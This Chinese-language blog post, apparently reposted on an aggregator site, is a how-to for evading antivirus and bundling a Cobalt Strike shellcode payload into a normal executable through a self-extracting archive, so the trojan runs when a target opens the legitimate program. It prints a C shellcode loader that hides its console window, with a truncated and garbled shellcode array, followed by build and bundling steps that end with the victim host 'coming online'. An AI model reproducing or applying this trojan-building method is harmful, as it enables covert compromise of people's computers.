exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路

这里演示的方式为shellcode框架加载自解压

1.生成shellcode

2.c加载(随便拉的加载器)#include

#include

#pragma comment(linker,”/subsystem:”windows”” /entry:””mainCRTStartup””””)

unsigned char shellcode[] =

“”xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8b””

“”x52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0″”

“”xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57″”;

void main()

{

((void(*)(void))&shellcode)();

}

3.自解压捆绑exe

当目标运行正常exe的同时会运行我们的木马

复现

使用cobaltstrike生成c的shellcode

使用vc6++打开

编译组建 生成exe

生成的exe文件位于桌面debug文件目录下

点击确认 生成捆绑马

exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路

软件正常打开 并且主机成功上线

这个加载器的免杀效果一般 大佬们可以自行替换

文章知识点与官方知识档案匹配,可进一步学习相关知识C技能树首页概览113143 人正在系统学习中 相关资源:TranslationLoaderBundle:具有数据库翻译加载器的Symfony2捆绑软件 ”

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2021年4月17日
下一篇 2021年4月17日

相关推荐